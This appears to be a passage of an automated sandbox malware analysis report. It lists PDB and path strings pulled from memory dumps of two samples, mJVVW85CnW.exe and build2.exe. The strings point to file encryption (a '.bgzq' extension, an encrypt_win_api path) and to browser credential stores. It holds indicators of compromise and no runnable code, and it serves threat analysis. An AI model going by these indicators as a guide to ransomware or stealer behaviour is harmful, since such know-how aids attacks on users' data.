Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\txyewy\G source: mJVVW85CnW.exe, 00000004.00000003.2328410477.00000000030FD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: mJVVW85CnW.exe, 00000004.00000003.2318938596.00000000034E3000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2317178357.00000000034D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\e\ source: mJVVW85CnW.exe, 00000004.00000003.2294302325.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2297057364.0000000009C4F000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2301719958.0000000009C3C000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2304465664.0000000009C5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: mJVVW85CnW.exe, 00000004.00000003.2259866717.0000000009C0E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2262409948.0000000009C30000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2258660685.0000000009BE9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\y source: mJVVW85CnW.exe, 00000004.00000003.2159934346.0000000009ABC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1941876297.0000000009ACA000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2178264435.0000000009AD0000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1867318408.0000000009ACC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\5 source: mJVVW85CnW.exe, 00000004.00000003.2159934346.0000000009ABC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1941876297.0000000009ACA000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2178264435.0000000009AD0000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1867318408.0000000009ACC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rion Data\Temp\Symbols\winload_prod.pdb\UZU source: mJVVW85CnW.exe, 00000004.00000003.2293581052.0000000009C78000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\y source: mJVVW85CnW.exe, 00000004.00000003.2284432496.0000000009BCF000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2288095953.0000000009BDC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\L source: mJVVW85CnW.exe, 00000004.00000003.2303995266.00000000033E4000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2297247654.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2305579643.00000000033E4000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2297502221.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2302675835.00000000033DD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: build2.exe, 00000008.00000002.2359987335.000000006C98F000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: mJVVW85CnW.exe, 00000004.00000003.2328410477.00000000030FD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\bwe\ source: mJVVW85CnW.exe, 00000004.00000003.2328410477.00000000030FD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdbP source: build2.exe, 00000008.00000002.2360500626.000000006F21D000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: 7C:\baduleropolec\83 roxihapuponab.pdb source: build2.exe, 00000007.00000000.1797035314.0000000000410000.00000002.00000001.01000000.00000008.sdmp, build2.exe, 00000007.00000002.1801295260.0000000000410000.00000002.00000001.01000000.00000008.sdmp, build2.exe, 00000008.00000000.1799119196.0000000000410000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: mJVVW85CnW.exe, 00000004.00000003.2296853812.0000000003434000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2284810160.0000000003434000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2260388125.0000000003404000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2261840679.000000000342D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2257701798.0000000003404000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2295116963.0000000003434000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ta\ source: mJVVW85CnW.exe, 00000004.00000003.2286586234.0000000009C67000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2294302325.0000000009C67000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2284432496.0000000009C67000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\ source: mJVVW85CnW.exe, 00000004.00000003.2240525022.0000000009AC5000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2241106214.0000000009AEC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2240997816.0000000009AD8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: mJVVW85CnW.exe, 00000004.00000003.2296903008.0000000003480000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2295116963.000000000346F000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2284027851.000000000348A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\prod.pdb.bgzqBARHEADLINES.json.bgzqpplication Data\Application Data\Microsoft\WindowsApps\python3.exee-4AF8-8D36-D6D6A1668750}.png.bgzqta\Default\Local Storage\*\oft Strong Cryptographic ProviderG source: mJVVW85CnW.exe, 00000004.00000003.2248884662.000000000312D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2249598871.000000000312E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\( source: mJVVW85CnW.exe, 00000004.00000003.2248884662.00000000030ED000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2249712503.0000000003105000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*_ source: mJVVW85CnW.exe, 00000004.00000003.2179560126.00000000031A0000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2178824044.0000000003196000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\C\*\ source: mJVVW85CnW.exe, 00000004.00000003.2294528005.0000000009B49000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: mJVVW85CnW.exe, 00000004.00000003.2296853812.0000000003434000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2257701798.000000000344C000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2284810160.0000000003434000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2297347518.000000000344D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2288349564.000000000343D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2295116963.0000000003434000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: mJVVW85CnW.exe, 00000004.00000003.2328178166.0000000003563000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2312713278.000000000312D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2311276415.0000000003500000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2312159139.0000000003510000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2316780959.0000000003553000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2312434569.0000000003513000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2325305724.0000000003553000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: mJVVW85CnW.exe, 00000004.00000003.2305805567.0000000003502000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2301768929.0000000003502000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2293719417.0000000003502000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\u source: mJVVW85CnW.exe, 00000004.00000003.2317539740.0000000003453000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: mJVVW85CnW.exe, 00000004.00000003.2304503353.000000000346F000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2303727711.000000000346C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: mJVVW85CnW.exe, mJVVW85CnW.exe, 00000004.00000002.2332971120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000005.00000002.1724733752.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000006.00000002.4155355080.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error.bgzq source: mJVVW85CnW.exe, 00000004.00000003.2178264435.0000000009AD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.ECApp_8wekyb3d8bbwe\RoamingState\ta\b3d8bbwe\AC\INetCookies\bbwe\AppData\pData\ad_prod.pdb\we\G source: mJVVW85CnW.exe, 00000004.00000003.2284432496.0000000009BCF000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2296376245.0000000009BE5000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2294528005.0000000009BE5000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2288095953.0000000009BE5000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2285800151.0000000009BE0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\es\ source: mJVVW85CnW.exe, 00000004.00000003.2248186822.00000000033CD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\es\+w source: mJVVW85CnW.exe, 00000004.00000003.2303995266.00000000033E4000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2297247654.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2305579643.00000000033E4000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2297502221.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2302675835.00000000033DD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sers\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.bgzq source: mJVVW85CnW.exe, 00000004.00000003.2179601467.0000000003163000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\z source: mJVVW85CnW.exe, 00000004.00000003.2218218924.0000000009AEE000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2159934346.0000000009ABC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2209724669.0000000009AD8000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218625709.0000000009AEF000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2194946115.0000000009AD7000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2178264435.0000000009AD0000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218149624.0000000009AE1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: mJVVW85CnW.exe, 00000004.00000003.2194490459.0000000009B86000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2194864281.0000000009BC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: mJVVW85CnW.exe, 00000004.00000003.2163571007.000000000313E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mJVVW85CnW.exe, 00000004.00000003.1793167082.00000000097E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\croso source: mJVVW85CnW.exe, 00000004.00000003.1962602904.0000000009B8E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1993610047.0000000009B8E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1994690551.0000000009B8E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2159817615.0000000009B8B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1961441195.0000000009B8E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: mJVVW85CnW.exe, 00000000.00000002.1692488180.0000000005E30000.00000040.00001000.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000001.00000002.1709912189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000003.00000002.1714943939.0000000005DF0000.00000040.00001000.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000002.2332971120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000005.00000002.1724733752.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000006.00000002.4155355080.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: mJVVW85CnW.exe, 00000004.00000003.2248978590.0000000009B3C000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2284810160.0000000003434000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2288349564.000000000343D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2260388125.0000000003404000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2261840679.000000000342D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2257701798.0000000003404000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2248186822.000000000343C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mi_exe_stub.pdb source: mJVVW85CnW.exe, 00000004.00000003.1807785358.00000000097E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: mJVVW85CnW.exe, 00000004.00000003.2217775658.0000000009B3C000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2209387473.0000000009B3C000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2195142562.0000000009B4D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2194490459.0000000009B2A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\RecoveryImproved\.pdb\ source: mJVVW85CnW.exe, 00000004.00000003.2328178166.0000000003563000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2311276415.0000000003500000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2312159139.0000000003510000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2316780959.0000000003553000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2312434569.0000000003513000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2325305724.0000000003553000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\r\ source: mJVVW85CnW.exe, 00000004.00000003.2217775658.0000000009B3C000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2209387473.0000000009B3C000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2195142562.0000000009B4D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2194490459.0000000009B2A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\e\ source: mJVVW85CnW.exe, 00000004.00000003.2286518478.0000000009AE8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ce\t[ source: mJVVW85CnW.exe, 00000004.00000003.2240212942.0000000009B7E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\G source: mJVVW85CnW.exe, 00000004.00000003.2218899764.0000000009C30000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2159183055.0000000009BFD000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2159696700.0000000009BFD000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218852977.0000000009C0E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ta\ source: mJVVW85CnW.exe, 00000004.00000003.2311578566.00000000033F1000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2323070329.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2329007033.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2303995266.00000000033E4000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2320258287.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2325524152.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2305579643.00000000033E4000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2319564845.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2302675835.00000000033DD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: mJVVW85CnW.exe, 00000004.00000003.2311276415.0000000003500000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2312159139.0000000003510000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2312434569.0000000003513000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2301768929.0000000003567000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\a source: mJVVW85CnW.exe, 00000004.00000003.1962602904.0000000009B8E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1993610047.0000000009B8E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1994690551.0000000009B8E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2159817615.0000000009B8B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1961441195.0000000009B8E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: mJVVW85CnW.exe, 00000004.00000003.2248151544.0000000009BBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\G source: mJVVW85CnW.exe, 00000004.00000003.2248884662.00000000030ED000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2249712503.0000000003105000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\ source: mJVVW85CnW.exe, 00000004.00000003.2260388125.0000000003404000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2261840679.000000000342D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2257701798.0000000003404000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2248186822.0000000003417000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: mJVVW85CnW.exe, 00000004.00000003.2248186822.00000000033CD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: mJVVW85CnW.exe, 00000004.00000003.2163571007.000000000313E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2194309118.000000000313E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2209279499.000000000313E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2217637925.000000000313E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\UZU source: mJVVW85CnW.exe, 00000004.00000003.2240145032.0000000009C58000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2248020922.0000000009C58000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2194776671.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2256526995.0000000009C58000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2209611098.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2217990497.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2284432496.0000000009C67000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218319196.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218932812.0000000009C6C000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2285437225.0000000009C78000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\f source: mJVVW85CnW.exe, 00000004.00000003.2296903008.0000000003480000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2295116963.000000000346F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\J source: mJVVW85CnW.exe, 00000004.00000003.2218899764.0000000009C30000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218852977.0000000009C0E000.00000004.00000020.00020000.00000000.sdmp
